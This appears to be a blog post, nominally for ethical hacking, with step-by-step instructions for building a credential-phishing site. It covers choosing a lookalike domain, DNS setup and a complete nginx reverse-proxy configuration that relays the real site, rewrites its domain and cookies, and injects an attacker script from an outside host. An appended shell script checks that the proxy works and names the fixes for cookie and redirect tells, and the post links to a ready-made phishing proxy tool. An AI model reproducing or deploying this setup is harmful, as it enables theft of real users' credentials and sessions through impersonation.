How to create the perfect phishing site

2019-05-11

This guide is for ethical hacking purposes only! Don’t use it for malicious stuff.

Phishing is the most common and easiest way to steal user credentials. As an administrator it is my job to secure our sites against different kinds of attacks. Unfortunately there is no technical way to stop a user from being lured to a phishing site in the first place (origin-bound authenticators such as FIDO2/U2F security keys are the one control that defeats the credential relay shown below).

In this blog post, I demonstrate the easiest way to create a perfect phishing site. In a follow-up post, I will discuss possible countermeasures.

Approach 1 - Copy The Site

This is the most common approach, and most how-to guides recommend it: download the target site and host the copy yourself. In my opinion this is not a very elegant way of doing it. It takes more effort, and the result is usually far from perfect: a static copy goes stale and breaks wherever the original relies on dynamic content. For an ordinary mass-phishing campaign this is often good enough, but for a targeted attack I prefer the other approach.

Approach 2 - Reverse Proxy

There is a much easier approach. With a reverse proxy you do not copy the site at all: every request the victim sends is forwarded to the real site, and the real site's response is rewritten on its way back to the victim. But how does that work? The following guide is not complete; it does not cover bypassing any countermeasures the target may have in place.

Step 1 - Set Up A Small Server

Set up a small root server, e.g. a $5 DigitalOcean droplet. This tutorial uses Debian/Ubuntu; the commands differ on other distributions.

Step 2 - Set Up A Domain

Find a domain that is as close to the target domain as possible. If the target domain is "next-gen-company.com", check whether "next-gen-company-ag.com" is available. The closer your domain is to the original, the more successful your phishing site will be.

Step 3 - Configure Your DNS Zone

Set up the A record for "next-gen-company-ag.com" and point it at your server's address (add an AAAA record too if the server has IPv6, since the configuration below also listens on [::]:80).

Step 4 - Install nginx

Install the nginx web server. On Debian/Ubuntu:

sudo apt-get install nginx

Step 5 - Configure nginx

Put the following configuration into the file /etc/nginx/sites-available/default. The sub_filter directives come from ngx_http_sub_module, which the default nginx package on Debian/Ubuntu (nginx-full / nginx-core) includes; if in doubt, check the configure arguments printed by nginx -V for --with-http_sub_module:


server {
    listen 80 default_server;
    listen [::]:80 default_server;

    location / {
        # Forward every request to the real site over TLS. nginx sends the
        # upstream's own name as Host by default, but not as SNI, so enable it.
        proxy_pass https://next-gen-company.com;
        proxy_ssl_server_name on;

        # Ask for an uncompressed body; sub_filter cannot rewrite gzip-compressed responses.
        proxy_set_header Accept-Encoding "";

        # Replace every occurrence of the real domain (matching is case-insensitive;
        # sub_filter_once off means all occurrences, not just the first) and inject
        # the attacker's script right before </head>.
        sub_filter next-gen-company.com next-gen-company-ag.com;
        sub_filter "</head>" "<script src='https://url.com/your-malicious-script.js'></script></head>";
        sub_filter_once off;

        # sub_filter does not touch headers; rewrite the cookie Domain attribute
        # or the browser will drop the real site's cookies on your domain.
        proxy_cookie_domain next-gen-company.com next-gen-company-ag.com;
    }
}


Step 6 - Reload Server

Check the configuration with

sudo nginx -t

If the configuration is ok, reload nginx:

sudo service nginx reload

That's it

That was simple, wasn't it? Just open next-gen-company-ag.com and watch the result.

There may be some more modifications to make (the configuration above only listens on plain port 80, so the browser flags the page as not secure until you add a certificate for your lookalike domain, and any subdomains of the target get rewritten to hosts that do not exist under your domain), but I think you got the point.
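As an added check that is not part of the original post: the following POSIX shell script emulates what the two sub_filter lines do to an HTML body and then verifies a proxied response for the tells a victim would notice (leftover references to the real domain, a missing script injection) and for the two things sub_filter does not handle at all, Set-Cookie Domain attributes and Location headers that still point at the real site. The domain names and the script URL are the post's own placeholders; the sample HTML and headers are constructed, and the live mode that fetches a URL with curl is only entered when a URL argument is given.

```sh
#!/bin/sh
# Added example, not part of the original post: emulate the two sub_filter
# rules offline and check a proxied response for the tells a victim (or a
# defender) would notice. The domains and the script URL are the post's own
# placeholders; the sample HTML and headers below are constructed.

TARGET="next-gen-company.com"       # the real site (proxy_pass upstream)
PHISH="next-gen-company-ag.com"     # the lookalike the victim visits
INJECT="<script src='https://url.com/your-malicious-script.js'></script>"

# Stand-in for the nginx sub_filter rules: rewrite every occurrence of the
# real domain and inject the script before </head>. Reads HTML on stdin.
# (nginx matches case-insensitively; this emulation is case-sensitive.)
emulate_sub_filter() {
    esc=$(printf '%s' "$TARGET" | sed 's/[.]/\\./g')   # "." is a regex metachar
    sed -e "s/$esc/$PHISH/g" -e "s#</head>#$INJECT</head>#"
}

# Body check: returns 0 if no reference to the real domain survived and the
# script landed right before </head>, 1 otherwise (reasons go to stderr).
check_body() {
    body=$(cat)
    rc=0
    if printf '%s\n' "$body" | grep -qiF "$TARGET"; then
        echo "FAIL: response still references $TARGET" >&2
        rc=1
    fi
    if ! printf '%s\n' "$body" | grep -qF "$INJECT</head>"; then
        echo "FAIL: script tag was not injected before </head>" >&2
        rc=1
    fi
    return $rc
}

# Header check: sub_filter only rewrites the body. A Set-Cookie whose Domain=
# names the real site is dropped by the browser (fix: proxy_cookie_domain),
# and a Location header pointing back at the real site ends the session on
# the real domain. Reads raw response headers on stdin; 0 if neither occurs.
check_headers() {
    hdrs=$(cat)
    rc=0
    if printf '%s\n' "$hdrs" | grep -i '^set-cookie:' | grep -i 'domain=' | grep -qiF "$TARGET"; then
        echo "WARN: Set-Cookie Domain= still names $TARGET; add proxy_cookie_domain" >&2
        rc=1
    fi
    if printf '%s\n' "$hdrs" | grep -i '^location:' | grep -qiF "$TARGET"; then
        echo "WARN: Location header still points at $TARGET; add a proxy_redirect rule" >&2
        rc=1
    fi
    return $rc
}

# Constructed samples of what the real site might return.
SAMPLE_BODY='<html><head><title>Login</title><link rel="stylesheet" href="https://next-gen-company.com/app.css"></head><body><form action="https://next-gen-company.com/login"><input name="user"><input name="pass" type="password"></form></body></html>'
SAMPLE_HEADERS='HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: session=abc123; Domain=.next-gen-company.com; Path=/; Secure'

# Live mode: ./check.sh http://next-gen-company-ag.com/ fetches the proxied
# page and runs both checks against it. Without an argument only the
# functions and samples are defined.
if [ $# -ge 1 ]; then
    h=$(mktemp); b=$(mktemp)
    curl -sS -D "$h" -o "$b" "$1"
    check_headers < "$h"; hrc=$?
    check_body < "$b"; brc=$?
    rm -f "$h" "$b"
    if [ "$hrc" -eq 0 ] && [ "$brc" -eq 0 ]; then
        echo "OK: $1 looks like a working proxy"
    fi
fi
```

Run it as ./check.sh http://next-gen-company-ag.com/ once nginx is reloaded; a WARN about Set-Cookie or Location is the sign that the page-level sub_filter is not enough and the header-level nginx directives are needed as well.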

Evilginx2

If you are looking for a ready-to-use solution for penetration testing, check out https://github.com/kgretzky/evilginx2, which builds on exactly this reverse-proxy idea.
